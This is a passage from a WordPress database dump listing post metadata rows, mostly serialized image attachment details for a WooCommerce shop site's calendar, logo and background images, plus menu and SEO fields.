\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2810,753,'_wp_attached_file','2022/02/calender-03-3.png'),(2811,753,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1793;s:4:\"file\";s:25:\"2022/02/calender-03-3.png\";s:8:\"filesize\";i:77282;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"calender-03-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9522;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"calender-03-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3808;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"calender-03-3-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2752;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"calender-03-3-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"calender-03-3-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"calender-03-3-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"calender-03-3-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"calender-03-3-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"calender-03-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"calender-03-3-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-3-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-3-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2812,754,'_wp_attached_file','2022/02/calender-03-4.png'),(2813,754,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1793;s:4:\"file\";s:25:\"2022/02/calender-03-4.png\";s:8:\"filesize\";i:77282;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"calender-03-4-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9522;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"calender-03-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3808;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"calender-03-4-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2752;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"calender-03-4-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"calender-03-4-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"calender-03-4-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"calender-03-4-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"calender-03-4-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"calender-03-4-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"calender-03-4-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-4-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-4-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2814,756,'_wp_attached_file','2022/02/calender-02.png'),(2815,756,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:23:\"2022/02/calender-02.png\";s:8:\"filesize\";i:76614;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"calender-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8715;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"calender-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3492;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"calender-02-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2664;}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"calender-02-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"calender-02-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"calender-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"calender-02-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"calender-02-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:24:\"calender-02-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"calender-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"calender-02-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"calender-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:21:\"calender-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:21:\"calender-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2816,758,'_wp_attached_file','2022/02/final-logo-02.png'),(2817,758,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:4167;s:6:\"height\";i:4167;s:4:\"file\";s:25:\"2022/02/final-logo-02.png\";s:8:\"filesize\";i:4896125;s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"final-logo-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59246;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"final-logo-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10987;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"final-logo-02-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3966;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"final-logo-02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"final-logo-02-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"final-logo-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"final-logo-02-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"final-logo-02-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:27:\"final-logo-02-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"final-logo-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"final-logo-02-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"final-logo-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"final-logo-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"final-logo-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"elementor_custom_150x150\";a:4:{s:4:\"file\";s:77:\"elementor/thumbs/final-logo-02-pk0mdeqn2rp7pz6evrahyis223rbymmxusvt9ajza4.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2827,763,'_wp_attached_file','2022/02/side-2-01.png'),(2828,763,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2417;s:6:\"height\";i:625;s:4:\"file\";s:21:\"2022/02/side-2-01.png\";s:8:\"filesize\";i:157552;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"side-2-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21652;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"side-2-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5668;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"side-2-01-50x13.png\";s:5:\"width\";i:50;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1092;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"side-2-01-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"side-2-01-1024x265.png\";s:5:\"width\";i:1024;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"side-2-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"side-2-01-768x199.png\";s:5:\"width\";i:768;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"side-2-01-1536x397.png\";s:5:\"width\";i:1536;s:6:\"height\";i:397;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"side-2-01-2048x530.png\";s:5:\"width\";i:2048;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"side-2-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"side-2-01-600x155.png\";s:5:\"width\";i:600;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"side-2-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"side-2-01-48x12.png\";s:5:\"width\";i:48;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"side-2-01-48x12.png\";s:5:\"width\";i:48;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2872,773,'_wp_attached_file','2022/02/bg-01.png'),(2873,773,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:8000;s:6:\"height\";i:4500;s:4:\"file\";s:17:\"2022/02/bg-01.png\";s:8:\"filesize\";i:894477;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59894;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8462;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"bg-01-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1397;}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"bg-01-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"bg-01-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"bg-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"bg-01-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:18:\"bg-01-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:19:\"bg-01-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"bg-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"bg-01-600x338.png\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"bg-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"bg-01-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2874,773,'_wp_attachment_is_custom_background','open-shop'),(2882,778,'_menu_item_type','taxonomy'),(2883,778,'_menu_item_menu_item_parent','0'),(2884,778,'_menu_item_object_id','85'),(2885,778,'_menu_item_object','product_tag'),(2886,778,'_menu_item_target',''),(2887,778,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2888,778,'_menu_item_xfn',''),(2889,778,'_menu_item_url',''),(2893,780,'_wp_attached_file','2022/02/bg-01-2.png'),(2894,780,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:8000;s:6:\"height\";i:4500;s:4:\"file\";s:19:\"2022/02/bg-01-2.png\";s:8:\"filesize\";i:250741;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"bg-01-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:278;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"bg-01-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"bg-01-2-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:634;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"bg-01-2-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"bg-01-2-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-01-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"bg-01-2-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"bg-01-2-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"bg-01-2-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"bg-01-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"bg-01-2-600x338.png\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-01-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"bg-01-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"bg-01-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2895,780,'_wp_attachment_is_custom_background','open-shop'),(2909,787,'_edit_lock','1644392492:1'),(2910,787,'_edit_last','1'),(2911,787,'fca_cc','a:5:{s:11:\"description\";s:48:\"Here are the rules to participate in this event.\";s:5:\"image\";s:0:\"\";s:9:\"show_name\";s:2:\"on\";s:5:\"terms\";s:36:\"The image should be based on mangoes\";s:3:\"end\";s:16:\"2022/02/14 12:47\";}'),(2912,745,'_edit_lock','1644400426:1'),(2913,745,'_edit_last','1'),(2914,745,'_aioseo_title',NULL),(2915,745,'_aioseo_description',NULL),(2916,745,'_aioseo_keywords',''),(2917,745,'_aioseo_og_title',NULL),(2918,745,'_aioseo_og_description',NULL),(2919,745,'_aioseo_og_article_section',''),(2920,745,'_aioseo_og_article_tags',''),(2921,745,'_aioseo_twitter_title',NULL),(2922,745,'_aioseo_twitter_description',NULL),(2926,745,'_elementor_template_type','wp-page'),(2931,802,'_wp_attached_file','2022/02/252-2529007_pudding-jelly-hd-png-download.png'),(2932,802,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:860;s:6:\"height\";i:489;s:4:\"file\";s:53:\"2022/02/252-2529007_pudding-jelly-hd-png-download.png\";s:8:\"filesize\";i:480641;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88301;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10439;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"252-2529007_pudding-jelly-hd-png-download-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2111;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-768x437.png\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-600x341.png\";s:5:\"width\";i:600;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-t